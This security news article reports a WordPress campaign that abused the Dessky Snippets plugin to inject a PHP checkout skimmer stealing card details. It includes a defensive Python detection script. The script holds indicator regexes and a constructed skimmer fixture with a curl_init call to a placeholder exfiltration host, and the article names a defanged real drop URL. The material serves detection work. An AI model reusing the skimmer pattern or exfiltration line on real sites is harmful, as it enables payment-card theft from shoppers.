Unidentified cyber adversaries are clandestinely exploiting obscure code snippet plugins for WordPress, embedding malicious PHP code within victimized websites to exfiltrate credit card information.
On May 11, 2024, Sucuri detected a campaign involving the misuse of a WordPress plugin known as Dessky Snippets, which facilitates the integration of custom PHP code. This plugin boasts over 200 active installations.
These cyber incursions frequently exploit known vulnerabilities in WordPress plugins or utilize easily deducible credentials to obtain administrative access, subsequently installing additional plugins—whether legitimate or otherwise—for further exploitation.
According to Sucuri, the Dessky Snippets plugin has been employed to implant server-side PHP skimming malware on compromised websites, thereby siphoning off financial data.
“This pernicious code was embedded in the dnsp_settings option within the WordPress wp_options table, designed to alter the WooCommerce checkout process by manipulating the billing form and injecting its own code,” security researcher Ben Martin stated.
Specifically, it introduces several new fields to the billing form, soliciting credit card details, such as names, addresses, credit card numbers, expiration dates, and Card Verification Value (CVV) numbers, which are subsequently transmitted to the URL “hxxps://2of[.]cc/wp-content/.”
A notable characteristic of this campaign is the disabling of the autocomplete attribute on the fraudulent billing form (i.e., `autocomplete="off"`).
“By deactivating this feature on the fake checkout form, it diminishes the chances of the browser alerting the user about the entry of sensitive information and ensures that the fields remain blank until manually completed by the user, thereby reducing suspicion and making the fields appear as standard, necessary inputs for the transaction,” Martin elaborated.
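The traits described above (PHP persisted in a snippet plugin's `wp_options` entry, a WooCommerce checkout hook that injects card fields with `autocomplete="off"`, and an outbound call to a third-party host) can be turned into a simple detection pass over `wp_options` rows. The script below is an added example for defenders, not Sucuri's tooling or the plugin's own code; the indicator regexes, the `SITE_HOST` value, the `custom_snippet_example` option name and the sample option values are all constructed for illustration, and the exfiltration host in the malicious sample is a placeholder rather than the campaign's real domain.

```python
"""Flag wp_options rows that look like a server-side checkout skimmer.

Added example, not Sucuri's or Dessky Snippets' code. Sample rows and
hostnames below are constructed; tune SITE_HOST and the regexes per site.
"""
import re
from urllib.parse import urlparse

SITE_HOST = "shop.example"  # the audited site's own hostname (constructed)

# Behaviours from the Sucuri write-up, expressed as regexes over raw option_value text.
INDICATORS = {
    "checkout_hook": re.compile(
        r"woocommerce_(after|before)_checkout_(billing|shipping)_form|woocommerce_checkout_fields"
    ),
    "card_field": re.compile(r"(card[_\s-]?number|cvv|cvc|exp(iry|iration))", re.I),
    "autocomplete_off": re.compile(r"autocomplete\s*=\s*[\"']?off", re.I),
    "outbound_call": re.compile(r"(curl_init|curl_setopt|file_get_contents|wp_remote_(post|get))\s*\("),
    "obfuscation": re.compile(r"(base64_decode|gzinflate|str_rot13|eval)\s*\("),
}
URL_RE = re.compile(r"https?://[A-Za-z0-9.-]+(?::\d+)?[^\s\"']*")


def external_hosts(value):
    """Return hostnames referenced in the value that are not the site itself."""
    hosts = set()
    for m in URL_RE.finditer(value):
        host = urlparse(m.group(0)).hostname
        if host and host.lower() != SITE_HOST:
            hosts.add(host.lower())
    return sorted(hosts)


def scan_option(name, value):
    """Score one (option_name, option_value) row and return the findings."""
    matched = [key for key, rx in INDICATORS.items() if rx.search(value)]
    hosts = external_hosts(value)
    # Card-capture fields plus any route off-site is the skimmer pattern;
    # obfuscated code wired into the checkout is suspicious on its own.
    suspicious = (
        ("card_field" in matched or "autocomplete_off" in matched)
        and ("outbound_call" in matched or bool(hosts))
    ) or ("obfuscation" in matched and "checkout_hook" in matched)
    return {"option": name, "indicators": matched, "external_hosts": hosts, "suspicious": suspicious}


def scan_options(rows):
    """Scan an iterable of (option_name, option_value) rows; keep rows with any indicator."""
    results = (scan_option(name, value) for name, value in rows)
    return [r for r in results if r["indicators"]]


# Constructed sample rows: a harmless snippet, a skimmer-like snippet, and a normal option.
BENIGN_SNIPPET = r"""
add_action('wp_footer', function () {
  echo '<p class="notice">Orders placed after 5pm ship next day.</p>';
});
"""

# Fixture only: mirrors the described traits, placeholder host, no working exfiltration.
SKIMMER_SNIPPET = r"""
add_action('woocommerce_after_checkout_billing_form', function () {
  echo '<input type="text" name="billing_card_number" autocomplete="off">';
  echo '<input type="text" name="billing_cvv" autocomplete="off">';
});
$ch = curl_init('https://exfil-host.invalid/wp-content/');
"""

SAMPLE_ROWS = [
    ("custom_snippet_example", BENIGN_SNIPPET),  # assumed option name
    ("dnsp_settings", SKIMMER_SNIPPET),          # option named in the article
    ("blogname", "Example Shop"),
]

if __name__ == "__main__":
    for finding in scan_options(SAMPLE_ROWS):
        print(finding)
```

In practice the rows come from `SELECT option_name, option_value FROM wp_options` on a database export, or from `wp option get dnsp_settings` for the specific plugin named here; the regexes work on the raw value whether or not the plugin PHP-serializes it. Treat a hit as a prompt to diff the snippet against what the site owner actually configured, not as proof of compromise on its own.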
This is not an isolated incident of threat actors leveraging legitimate code snippet plugins for nefarious purposes. Last month, the company disclosed the exploitation of the WPCode code snippet plugin to inject malicious JavaScript into WordPress sites, redirecting site visitors to VexTrio domains.
Another malware campaign, termed Sign1, has reportedly compromised over 39,000 WordPress sites in the past six months by using malicious JavaScript injections via the Simple Custom CSS and JS plugin to redirect users to fraudulent sites.
WordPress site proprietors, particularly those offering e-commerce functionalities, are advised to maintain their sites and plugins up-to-date, employ robust passwords to thwart brute-force attacks, and routinely audit their sites for signs of malware or any unauthorized modifications.